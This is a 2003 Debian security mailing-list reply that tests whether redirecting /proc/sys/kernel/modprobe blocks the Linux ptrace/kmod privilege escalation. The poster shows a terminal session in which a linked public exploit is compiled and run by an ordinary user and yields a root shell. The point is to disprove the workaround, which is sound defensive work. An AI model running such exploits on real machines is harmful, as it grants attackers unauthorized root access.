Re: [d-security] Re: [d-security] Re: [Fwd: Re: LWN: Ptrace vulnerability in 2.2 and 2.4 kernels]
On Tue, Apr 01, 2003 at 02:40:44PM +0100, David Ramsden wrote:
> > > echo unexisting_binary > /proc/sys/kernel/modprobe
> > > Can we trust this solution ?
> > NO, it does not prevent the exploit.
> >
> > It does prevent the km3.c example exploit but not e.g.
> > http://isec.pl/cliph/isec-ptrace-kmod-exploit.c
>
> I'd have to disagree with you there.
> I've done this to one Debian box (3.0 running 2.2.20) and it does stop the
> above exploit:
>
> $ echo "/this/doesnt/exist" > /proc/sys/kernel/modprobe
> $ gcc isec-ptrace-kmod-exploit.c -o isec-ptrace-kmod-exploit
> $ ./isec-ptrace-kmod-exploit
> $ [+] Attached to 18765
> (gets stuck here - have to use Ctrl+C)
> $
Can it be that you had loaded no-ptrace-module.o or someone patched your
kernel? See:
$ uname -r
2.4.19
$ gcc isec-ptrace-kmod-exploit.c -o isec-ptrace-kmod-exploit
In file included from /usr/include/asm/user.h:5,
from /usr/include/linux/user.h:1,
from isec-ptrace-kmod-exploit.c:37:
/usr/include/linux/ptrace.h:22: warning: `PTRACE_SYSCALL' redefined
/usr/include/sys/ptrace.h:103: warning: this is the location of the
previous definition
(it's a very old machine, workes fine on others)
$ id
uid=1001(ch) gid=1005(ch) groups=1005(ch)
$ ls -al isec-ptrace-kmod-exploit*
-rwxr-xr-x 1 ch ch 8964 Apr 1 17:46 isec-ptrace-kmod-exploit
-rw-r--r-- 1 ch ch 3737 Apr 1 17:45 isec-ptrace-kmod-exploit.c
$ ./isec-ptrace-kmod-exploit
[+] Attached to 4660
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000ecb4
[+] Now wait for suid shell...
sh-2.03# exit
exit
Q.E.D. :-)
bye,
-christian-
--
"That's one small step for man, one giant leap for mankind"
- first words of a human on the moon, Neil Armstrong 1969
"Let's get this motherfucker out of here!"
- last words of a human on the moon, Eugene Cernan 1972
Reply to: